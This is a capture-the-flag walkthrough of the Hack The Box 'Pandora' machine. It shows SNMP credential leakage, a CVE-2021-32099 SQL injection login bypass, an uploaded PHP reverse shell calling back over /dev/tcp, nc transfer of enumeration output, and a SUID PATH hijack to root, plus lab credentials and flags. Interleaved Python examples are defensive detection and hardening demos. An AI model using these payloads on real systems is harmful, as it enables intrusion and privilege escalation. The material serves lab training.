HTB Pandora done
Pandora
OS:
Linux
Technology:
SNMP
Pandora FMS v7.0NG.742_FIX_PERL2020
IP Address:
10.10.11.136
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
161/udp open snmp
Users and passwords:
Obtained via SNMP
L: daniel
P: HotelBabylon23
---
Nmap - TCP scan
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.136_nmap 10.10.11.136 ; cat 10.10.11.136_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-19 09:53 CEST
Nmap scan report for 10.10.11.136
Host is up (0.066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24c295a5c30b3ff3173c68d7af2b5338 (RSA)
| 256 b1417799469a6c5dd2982fc0329ace03 (ECDSA)
|_ 256 e736433ba9478a190158b2bc89f65108 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Open website:
Nothing interesting on the website
Add hostname to /etc/hosts
We add panda.htb to /etc/hosts
┌──(root㉿pentest)-[~]
└─# echo "10.10.11.136 panda.htb" >> /etc/hosts
┌──(root㉿pentest)-[~]
└─# cat /etc/hosts | grep panda.htb
10.10.11.136 panda.htb
┌──(root㉿pentest)-[~]
└─#
Nmap - UDP scan
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ sudo nmap -sU -oA 10.10.11.136_udp_nmap 10.10.11.136 ; cat 10.10.11.136_udp_nmap.nmap | grep "udp.*open"
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-19 12:11 CEST
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.038s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp
Enumerate SNMP
I found a login and password:
L: daniel
P: HotelBabylon23
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ snmp-check 10.10.11.136 | tee 10.10.11.136_snmp_check
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.11.136:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.10.11.136
Hostname : pandora
Description : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
Contact : Daniel
Location : Mississippi
Uptime snmp : 02:12:25.74
Uptime system : 02:12:18.79
System date : 2024-4-19 09:58:00.0
[*] Network information:
IP forwarding enabled : no
Default TTL : 64
TCP segments received : 67162
TCP segments sent : 68226
TCP segments retrans : 2300
Input datagrams : 78612
Delivered datagrams : 78592
Output datagrams : 80881
[*] Network interfaces:
Interface : [ up ] lo
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 10 Mbps
MTU : 65536
In octets : 700804
Out octets : 700804
Interface : [ up ] VMware VMXNET3 Ethernet Controller
Id : 2
Mac Address : 00:50:56:b9:28:87
Type : ethernet-csmacd
Speed : 4294 Mbps
MTU : 1500
In octets : 4467082
Out octets : 5440756
[*] Network IP:
Id IP Address Netmask Broadcast
2 10.10.11.136 255.255.254.0 1
1 127.0.0.1 255.0.0.0 0
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 10.10.10.2 0.0.0.0 1
10.10.10.0 0.0.0.0 255.255.254.0 0
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 22 0.0.0.0 0 listen
10.10.11.136 37624 1.1.1.1 53 synSent
127.0.0.1 3306 0.0.0.0 0 listen
127.0.0.53 53 0.0.0.0 0 listen
[*] Listening UDP ports:
Local address Local port
0.0.0.0 161
127.0.0.53 53
[*] Processes:
...
...
1096 runnable host_check /usr/bin/host_check -u daniel -p HotelBabylon23
1155 runnable apache2 /usr/sbin/apache2 -k start
1314 unknown kworker/
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ cat 10.10.11.136_snmp_check| grep -C1 -i "\-u daniel"
875 runnable cron /usr/sbin/CRON -f
883 runnable sh /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
898 runnable apache2 /usr/sbin/apache2 -k start
--
1037 runnable apache2 /usr/sbin/apache2 -k start
1096 runnable host_check /usr/bin/host_check -u daniel -p HotelBabylon23
1155 runnable apache2 /usr/sbin/apache2 -k start
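The credentials above leak because SNMP (read community 'public', SNMPv1) exposes the hrSWRunTable, which includes every process's full command line. The check below is an added example, not part of the original writeup: it scans process-table lines in the layout snmp-check prints for options that commonly carry a secret and reports them with the value masked, so the same review can be run over an SNMP walk or over ps output before an attacker does. The sample lines reuse the page's host_check entries plus one constructed mysql line for the --password=value form; the flag list is an assumption to extend per environment.

```python
import re
from typing import Dict, List

# Constructed sample in the layout snmp-check prints for the hrSWRunTable
# ("PID  status  name  path and arguments"). The host_check lines mirror the
# page's output; the mysql line is made up to show the --password=value form.
SAMPLE_PROCESS_LINES = """\
875 runnable cron /usr/sbin/CRON -f
883 runnable sh /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
898 runnable apache2 /usr/sbin/apache2 -k start
1042 runnable mysql /usr/bin/mysql --user=app --password=S3cretDbPass -h 127.0.0.1
1096 runnable host_check /usr/bin/host_check -u daniel -p HotelBabylon23
1314 unknown kworker/
"""

# "PID status name rest-of-command-line"
PROCESS_LINE_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)\s*(.*)$")

# Options that commonly carry a secret as the next token or as opt=value
# (assumed list, extend per environment). Longer names come first so
# "--password" is not reported as "-p".
CRED_FLAG_RE = re.compile(
    r"(?:^|(?<=\s))(--?(?:password|passwd|pass|secret|token|api[-_]?key|p|P))"
    r"(?:=|\s+)(\S+)"
)


def mask(value: str) -> str:
    """Keep the first two characters so a finding is recognisable without restating the secret."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "*" * len(value)


def find_credentials_in_process_table(text: str) -> List[Dict[str, object]]:
    """Return one finding per credential-looking option found in the process list."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = PROCESS_LINE_RE.match(line)
        if not m:
            continue
        pid, _state, name, cmdline = m.groups()
        for flag_match in CRED_FLAG_RE.finditer(cmdline):
            flag, value = flag_match.groups()
            # Drop quoting that belongs to an enclosing "sh -c '...'" wrapper.
            value = value.strip("'\"")
            findings.append({
                "pid": int(pid),
                "process": name,
                "flag": flag,
                "value_masked": mask(value),
            })
    return findings


if __name__ == "__main__":
    for f in find_credentials_in_process_table(SAMPLE_PROCESS_LINES):
        print(f"pid {f['pid']:>5} {f['process']:<12} {f['flag']} {f['value_masked']}")
```

The fix on the host side is to stop passing secrets on the command line at all (host_check could read them from a mode-0600 file or the environment) and to restrict or disable SNMPv1/v2c read access to the process table; the scan only tells you where that has not been done.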
SSH login as user: daniel
H: 10.10.11.136
L: daniel
P: HotelBabylon23
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ssh daniel@panda.htb
The authenticity of host 'panda.htb (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'panda.htb' (ED25519) to the list of known hosts.
daniel@panda.htb's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 19 Apr 10:11:59 UTC 2024
System load: 0.0
Usage of /: 63.0% of 4.87GB
Memory usage: 8%
Swap usage: 0%
Processes: 233
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:2887
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$ cd ~
daniel@pandora:~$ ls -a
. .. .bash_history .bash_logout .bashrc .cache .profile .ssh
daniel@pandora:~$
LinPEAS
Download linpeas.sh
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh ; file linpeas.sh
--2024-04-19 12:20:13-- https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh [following]
--2024-04-19 12:20:14-- https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/peass-ng/PEASS-ng/releases/download/20240414-ed0a5fac/linpeas.sh [following]
--2024-04-19 12:20:14-- https://github.com/peass-ng/PEASS-ng/releases/download/20240414-ed0a5fac/linpeas.sh
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/240660d8-8826-4db7-bd47-37523314ef14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240419%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240419T102015Z&X-Amz-Expires=300&X-Amz-Signature=f5e02bf15c0177e40035dfb25f643234ce7efb039eea95417d0015a7bd9dc412&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2024-04-19 12:20:14-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/240660d8-8826-4db7-bd47-37523314ef14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240419%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240419T102015Z&X-Amz-Expires=300&X-Amz-Signature=f5e02bf15c0177e40035dfb25f643234ce7efb039eea95417d0015a7bd9dc412&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860323 (840K) [application/octet-stream]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[==============================================>] 840.16K 4.98MB/s in 0.2s
2024-04-19 12:20:15 (4.98 MB/s) - ‘linpeas.sh’ saved [860323/860323]
linpeas.sh: POSIX shell script, Unicode text, UTF-8 text executable, with very long lines (1779)
Upload linpeas.sh
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.136 - - [19/Apr/2024 12:21:28] "GET /linpeas.sh HTTP/1.1" 200 -
---
daniel@pandora:~$ wget 10.10.16.7/linpeas.sh -O /tmp/linpeas.sh
--2024-04-19 10:21:29-- http://10.10.16.7/linpeas.sh
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860323 (840K) [text/x-sh]
Saving to: ‘/tmp/linpeas.sh’
/tmp/linpeas.sh 100%[==============================================>] 840.16K 1023KB/s in 0.8s
2024-04-19 10:21:30 (1023 KB/s) - ‘/tmp/linpeas.sh’ saved [860323/860323]
daniel@pandora:~$ chmod a+x /tmp/linpeas.sh
daniel@pandora:~$ /tmp/./linpeas.sh -a > linpeas.out &
[1] 2030
daniel@pandora:~$ grep: /etc/cloud/cloud.cfg: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:09 --:--:-- 0curl: (6) Could not resolve host: metadata.google.internal
Download linpeas.out
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ nc -l -p 80 > linpeas.out
---
daniel@pandora:~$ nc -w 3 10.10.16.7 80 < linpeas.out
Findings
I see that user matt can execute the binary /usr/bin/pandora_backup
___
-rwsr-x--- 1 root matt 17K Dec 3 2021 /usr/bin/pandora_backup (Unknown SUID binary!)
---
I see that the website is hosted locally on port 80
daniel@pandora:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:161 0.0.0.0:*
udp UNCONN 0 0 [::1]:161 [::]:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
Create ssh tunnel
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ssh -L 2222:localhost:80 -N -f -l daniel 10.10.11.136
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:181: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ED25519) to the list of known hosts.
daniel@10.10.11.136's password:
Open website: http://localhost:2222/pandora_console/
We open the website (it is Pandora FMS Next Generation) and note the version:
v7.0NG.742_FIX_PERL2020
Exploit: CVE-2021-32099 SQLi Bypass login
https://github.com/ibnuuby/CVE-2021-32099
Run exploit
1. Run payload
http://localhost:2222/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1
---
2. Open website: http://localhost:2222/pandora_console/
We are the admin
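Why the payload above logs us in as admin, and what the fix looks like, as an added example that is not part of the original writeup or of Pandora FMS: the session_id parameter is concatenated into a query against the PHP session table, so the UNION returns a forged row whose data column deserialises to id_usuario = "admin". The code below rebuilds that with an in-memory SQLite table modelled on tsessions_php (columns id_session, last_active, data are an assumption, as is the constructed "alice" session), runs the page's payload against a concatenating lookup and against a hardened lookup (session-id allowlist plus a bound parameter), and decodes the PHP session format to show which user each variant would trust.

```python
import re
import sqlite3
from typing import Dict, List, Optional, Tuple

# The page's session_id value from the chart_generator.php request, unencoded.
PAYLOAD = "a' UNION SELECT 'a',1,'id_usuario|s:5:\"admin\";' as data FROM tsessions_php WHERE '1'='1"

# Constructed legitimate session id (32 hex chars, PHP's default sid format).
LEGIT_SESSION_ID = "3f1c9b7a2e4d8c6b5a4f3e2d1c0b9a8f"

# PHP builds session ids from [A-Za-z0-9,-]; anything else is not a session id.
SESSION_ID_RE = re.compile(r"^[A-Za-z0-9,-]{22,256}$")
PHP_SESSION_KEY_RE = re.compile(r"([^|;]+)\|")

Row = Tuple[str, int, str]


def build_demo_db() -> sqlite3.Connection:
    """In-memory table modelled on tsessions_php; the one row is constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tsessions_php (id_session TEXT PRIMARY KEY, last_active INTEGER, data TEXT)")
    conn.execute(
        "INSERT INTO tsessions_php VALUES (?, ?, ?)",
        (LEGIT_SESSION_ID, 1713521200, 'id_usuario|s:5:"alice";last_login|i:1713521200;'),
    )
    conn.commit()
    return conn


def lookup_session_vulnerable(conn: sqlite3.Connection, session_id: str) -> List[Row]:
    """String concatenation: the quote in the payload ends the literal and the UNION adds a forged row."""
    sql = f"SELECT id_session, last_active, data FROM tsessions_php WHERE id_session = '{session_id}'"
    return conn.execute(sql).fetchall()


def lookup_session_safe(conn: sqlite3.Connection, session_id: str) -> List[Row]:
    """Allowlist the id, then bind it as a parameter so it is only ever compared, never parsed as SQL."""
    if not SESSION_ID_RE.match(session_id):
        return []
    sql = "SELECT id_session, last_active, data FROM tsessions_php WHERE id_session = ?"
    return conn.execute(sql, (session_id,)).fetchall()


def parse_php_session(data: str) -> Dict[str, object]:
    """Decode the 'key|serialized;' pairs PHP stores in a session row (scalar types only)."""
    out: Dict[str, object] = {}
    pos = 0
    while pos < len(data):
        key_match = PHP_SESSION_KEY_RE.match(data, pos)
        if not key_match:
            raise ValueError(f"bad session data at offset {pos}")
        key = key_match.group(1)
        pos = key_match.end()
        tag = data[pos]
        if tag == "s":                                   # s:<len>:"<bytes>";
            length_end = data.index(":", pos + 2)
            length = int(data[pos + 2:length_end])
            start = length_end + 2                       # skip ':"'
            out[key] = data[start:start + length]
            pos = start + length + 2                     # skip '";'
        elif tag == "i":                                 # i:<int>;
            end = data.index(";", pos)
            out[key] = int(data[pos + 2:end])
            pos = end + 1
        elif tag == "b":                                 # b:0; or b:1;
            out[key] = data[pos + 2] == "1"
            pos += 4
        elif tag == "N":                                 # N;
            out[key] = None
            pos += 2
        else:
            raise ValueError(f"unsupported PHP type {tag!r} for key {key!r}")
    return out


def effective_user(rows: List[Row]) -> Optional[str]:
    """The user the application would trust after loading the first matching session row."""
    if not rows:
        return None
    return parse_php_session(rows[0][2]).get("id_usuario")


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable + payload ->", effective_user(lookup_session_vulnerable(db, PAYLOAD)))
    print("safe + payload       ->", effective_user(lookup_session_safe(db, PAYLOAD)))
    print("safe + real id       ->", effective_user(lookup_session_safe(db, LEGIT_SESSION_ID)))
```

Two things worth noticing: the UNION selects FROM tsessions_php, so the forged row only appears if the table has at least one real row, which a live console always has; and the allowlist alone would already stop this payload, but the bound parameter is what protects against the next payload that does fit the charset.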
Create revshell
Netcat
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.136] 44798
bash: cannot set terminal process group (850): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console/images$ id
id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
matt@pandora:/var/www/pandora/pandora_console/images$
---
Upload revshell.php through the console's file manager
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ cat revshell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.7/80 0>&1'");
?>
___
Upload file: revshell.php
http://localhost:2222/pandora_console/index.php?sec=gextensions&sec2=godmode/setup/file_manager
___
Start revshell
http://localhost:2222/pandora_console/images/revshell.php
Open flag: user.txt
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.136] 44798
bash: cannot set terminal process group (850): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console/images$ id
id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
matt@pandora:/var/www/pandora/pandora_console/images$ cd ~
cd ~
matt@pandora:/home/matt$ ls
ls
user.txt
matt@pandora:/home/matt$ cat user.txt
cat user.txt
96073bb63c33b95d7910c2b11523fb1c
matt@pandora:/home/matt$
Privilege Escalation
ltrace /usr/bin/pandora_backup
We see that the binary calls system() with a relative tar command, so the program name is resolved through PATH at run time:
tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz
Note that under ltrace getuid() and geteuid() both return 1000 and tar fails with Permission denied: the kernel does not honour the set-uid bit for a traced process, so the trace shows what the binary does, not the privileges it has when run normally.
___
matt@pandora:/home/matt$ ls -l /usr/bin/pandora_backup
ls -l /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 16816 Dec 3 2021 /usr/bin/pandora_backup
matt@pandora:/home/matt$
matt@pandora:/home/matt$ ltrace /usr/bin/pandora_backup
ltrace /usr/bin/pandora_backup
getuid() = 1000
geteuid() = 1000
setreuid(1000, 1000) = 0
puts("PandoraFMS Backup Utility") = 26
puts("Now attempting to backup Pandora"...) = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 512
puts("Backup failed!\nCheck your permis"...) = 39
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
Backup failed!
Check your permissions!
+++ exited (status 1) +++
Generate SSH key
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519): ./id_rsa_pandora
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa_pandora
Your public key has been saved in ./id_rsa_pandora.pub
The key fingerprint is:
SHA256:ewxjGuBtJKGVy/7b3fX9sdNGBBMVqrmPmV09MJThHAI kali@pentest
The key's randomart image is:
+--[ED25519 256]--+
| o. E.. o.+o|
| o.. + B |
| ..o.. * o |
| .o= + .|
| .. + S o o . |
| .. + = . o o|
| .. . o. .=o|
| .. o .*..oB|
| ... .+.o o*|
+----[SHA256]-----+
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ls id_rsa_pandora*
id_rsa_pandora id_rsa_pandora.pub
Upload SSH public key
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.136 - - [22/Apr/2024 13:26:41] "GET /id_rsa_pandora.pub HTTP/1.1" 200 -
---
matt@pandora:/home/matt$ mkdir .ssh
mkdir .ssh
matt@pandora:/home/matt$ cd .ssh
cd .ssh
matt@pandora:/home/matt/.ssh$ wget 10.10.16.7/id_rsa_pandora.pub
wget 10.10.16.7/id_rsa_pandora.pub
--2024-04-22 11:26:41-- http://10.10.16.7/id_rsa_pandora.pub
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 94 [application/vnd.exstream-package]
Saving to: 'id_rsa_pandora.pub'
0K 100% 5.35K=0.02s
2024-04-22 11:26:41 (5.35 KB/s) - 'id_rsa_pandora.pub' saved [94/94]
matt@pandora:/home/matt/.ssh$ cd ..
cd ..
matt@pandora:/home/matt$ chmod -R 700 .ssh
chmod -R 700 .ssh
matt@pandora:/home/matt$ mv .ssh/id_rsa_pandora.pub .ssh/authorized_keys
mv .ssh/id_rsa_pandora.pub .ssh/authorized_keys
matt@pandora:/home/matt$
SSH connect
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ssh [email protected] -i /tmp/id_rsa_pandora
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 22 Apr 11:55:19 UTC 2024
System load: 0.0
Usage of /: 63.2% of 4.87GB
Memory usage: 8%
Swap usage: 0%
Processes: 240
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:3f43
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$
SUID Path Hijack
matt@pandora:~$ cd /tmp/
matt@pandora:/tmp$ echo "/bin/bash" > tar
matt@pandora:/tmp$ chmod 777 tar
matt@pandora:/tmp$ export PATH=.:$PATH
matt@pandora:/tmp$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp# id
uid=0(root) gid=1000(matt) groups=1000(matt)
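The root cause of the escalation above is a set-uid program running system("tar ...") with a relative program name and the caller's environment. The following is an added example (not the page's code and not the real pandora_backup, which is a C binary): a Python mirror of that call beside a hardened variant, plus a harness that plants a fake tar in a temporary directory and prepends it to PATH exactly as the writeup does, to show that the hardened variant ignores it. TRUSTED_PATH and the temporary fake are assumptions of the demo.

```python
import os
import shutil
import stat
import subprocess
import tempfile
from typing import Dict, Optional, Sequence

# Directories a privileged program should resolve helpers from (assumed value).
TRUSTED_PATH = "/usr/bin:/bin"


def run_backup_vulnerable(command: str = "tar --version") -> str:
    """Mirror of system("tar ..."): relative name, inherited environment, via the shell."""
    proc = subprocess.run(command, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def run_backup_hardened(args: Sequence[str] = ("tar", "--version")) -> Optional[str]:
    """Resolve the program against a fixed PATH, pass argv without a shell,
    and give the child a minimal environment instead of the caller's."""
    exe = shutil.which(args[0], path=TRUSTED_PATH)
    if exe is None:
        return None                      # refuse rather than fall back to the caller's PATH
    proc = subprocess.run([exe, *args[1:]], capture_output=True, text=True,
                          env={"PATH": TRUSTED_PATH})
    return proc.stdout + proc.stderr


def simulate_path_hijack() -> Dict[str, Optional[str]]:
    """Plant a fake 'tar' (constructed) in a temp dir, prepend it to PATH as on the
    page, and run both variants. Returns what each variant actually executed."""
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, "tar")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho HIJACKED-FAKE-TAR\n")
        os.chmod(fake, stat.S_IRWXU)
        old_path = os.environ.get("PATH", "")
        os.environ["PATH"] = d + ":" + old_path
        try:
            return {"vulnerable": run_backup_vulnerable(),
                    "hardened": run_backup_hardened()}
        finally:
            os.environ["PATH"] = old_path


if __name__ == "__main__":
    result = simulate_path_hijack()
    print("vulnerable ran:", result["vulnerable"].strip().splitlines()[0])
    print("hardened ran:  ", (result["hardened"] or "tar not found in TRUSTED_PATH").strip().splitlines()[0])
```

In the C binary the same fix is to call the helper by absolute path with a fixed argv (fork/execve rather than system()), and to reset PATH with setenv before any lookup; the set-uid bit on pandora_backup is only dangerous because it trusts whatever PATH the invoking user hands it.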
Read flag: root.txt
root@pandora:/tmp# cd /root
root@pandora:/root# ls
root.txt
root@pandora:/root# cat root.txt
4367ba92259c26a4af3e31a32bff159a
root@pandora:/root#
References
[CVE-2021-32099 SQLi Bypass login](https://github.com/ibnuuby/CVE-2021-32099)
Lessons Learned